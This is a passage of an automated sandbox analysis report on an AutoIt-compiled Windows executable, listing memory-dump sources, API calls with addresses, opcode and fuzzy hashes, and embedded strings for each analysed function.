          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Close$OpenQueryValue
          • String ID: Control Panel\Mouse
          • API String ID: 1607946009-824357125
          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
          • String ID:
          • API String ID: 3170942423-0
          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
          APIs
          • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
          • CloseHandle.KERNEL32(?), ref: 00457E09
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CloseExecuteHandleShell_wcscpy_wcslen
          • String ID: <$@
          • API String ID: 2417854910-1426351568
          • Opcode ID: 514557f22d0f6e93a977befcff9d0e90bbfb1ee23c4dfd548d9af5fe2b3cdb46
          • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
          • Opcode Fuzzy Hash: 514557f22d0f6e93a977befcff9d0e90bbfb1ee23c4dfd548d9af5fe2b3cdb46
          • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
          • String ID:
          • API String ID: 2782032738-0
          • Opcode ID: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
          • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
          • Opcode Fuzzy Hash: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
          • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
          APIs
          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?), ref: 004102D2
            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
          • String ID: X$pWH
          • API String ID: 85490731-941433119
          • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
          • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
          • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
          • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __fread_nolock_memmove
          • String ID: EA06
          • API String ID: 1988441806-3962188686
          • Opcode ID: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
          • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
          • Opcode Fuzzy Hash: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
          • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
          APIs
          • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Temp$FileNamePath
          • String ID: aut
          • API String ID: 3285503233-3010740371
          • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
          • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
          • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
          • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __filbuf__getptd_noexit__read_memcpy_s
          • String ID:
          • API String ID: 1794320848-0
          • Opcode ID: 46bae6a85b22b2e6998b893eef9abdde81a4ff8b830947c69d08c34cc75fe5f8
          • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
          • Opcode Fuzzy Hash: 46bae6a85b22b2e6998b893eef9abdde81a4ff8b830947c69d08c34cc75fe5f8
          • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
          APIs
          • _malloc.LIBCMT ref: 0043214B
            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
          • _malloc.LIBCMT ref: 0043215D
          • _malloc.LIBCMT ref: 0043216F
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _malloc$AllocateHeap
          • String ID:
          • API String ID: 680241177-0
          • Opcode ID: e1a845909f2f9eab51ac6a7513d1dda243d5426b5a0d4f49597d7e8137c2ff09
          • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
          • Opcode Fuzzy Hash: e1a845909f2f9eab51ac6a7513d1dda243d5426b5a0d4f49597d7e8137c2ff09
          • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
          APIs
          • TranslateMessage.USER32(?), ref: 00409556
          • DispatchMessageW.USER32(?), ref: 00409561
          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Message$DispatchPeekTranslate
          • String ID:
          • API String ID: 4217535847-0
          • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
          • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
          • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
          • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
          APIs
          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
          • SetFileTime.KERNEL32(00000000,?,00000000,?), ref: 00431E0D
          • CloseHandle.KERNEL32(00000000), ref: 00431E14
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: File$CloseCreateHandleTime
          • String ID:
          • API String ID: 3397143404-0
          • Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
          • Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
          • Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
          • Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
          APIs
            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
          • _free.LIBCMT ref: 004295A0
            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
          • String ID: >>>AUTOIT SCRIPT<<<
          • API String ID: 3938964917-2806939583
          • Opcode ID: 30c3a893ad0b65a38917a8157b14c8f4f06a447e36ef79e5ee8203c11f05b23d
          • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
          • Opcode Fuzzy Hash: 30c3a893ad0b65a38917a8157b14c8f4f06a447e36ef79e5ee8203c11f05b23d
          • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
          Strings
          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _strcat
          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
          • API String ID: 1765576173-2684727018
          • Opcode ID: d715a66e0c8660b9e08d61c1af9b9862aa67830396d19e1806161a4342f98bce
          • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
          • Opcode Fuzzy Hash: d715a66e0c8660b9e08d61c1af9b9862aa67830396d19e1806161a4342f98bce
          • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
          APIs
            • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
          • _strcat.LIBCMT ref: 0040F786
            • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
            • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
          • String ID:
          • API String ID: 3199840319-0
          • Opcode ID: 98babcbf6829924b463e4e9c6b250955a06192eeb6296d8e3aefad6c6c7dc4f2
          • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
          • Opcode Fuzzy Hash: 98babcbf6829924b463e4e9c6b250955a06192eeb6296d8e3aefad6c6c7dc4f2
          • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
          APIs
          • SystemParametersInfoW.USER32 ref: 0040D779
          • FreeLibrary.KERNEL32(?), ref: 0040D78E
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: FreeInfoLibraryParametersSystem
          • String ID:
          • API String ID: 3403648963-0
          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
          APIs
            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
          • __lock_file.LIBCMT ref: 00414A8D
            • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
          • __fclose_nolock.LIBCMT ref: 00414A98
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
          • String ID:
          • API String ID: 2800547568-0
          • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
          • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
          • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
          • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
          APIs
          • timeGetTime.WINMM ref: 0040D3CC
            • Part of subcall function 004091E0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
          • Sleep.KERNEL32(00000000), ref: 0042E19F
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessagePeekSleepTimetime
          • String ID:
          • API String ID: 1792118007-0
          • Opcode ID: e88d716908253749338327e9f2013244fb9d66bab2d0e773e4b96298d8ec57c5
          • Instruction ID: 26d929e072eec6e6aac8e4f5aec239a67d26821fa4f7aa926e5107a94785e9a2
          • Opcode Fuzzy Hash: e88d716908253749338327e9f2013244fb9d66bab2d0e773e4b96298d8ec57c5
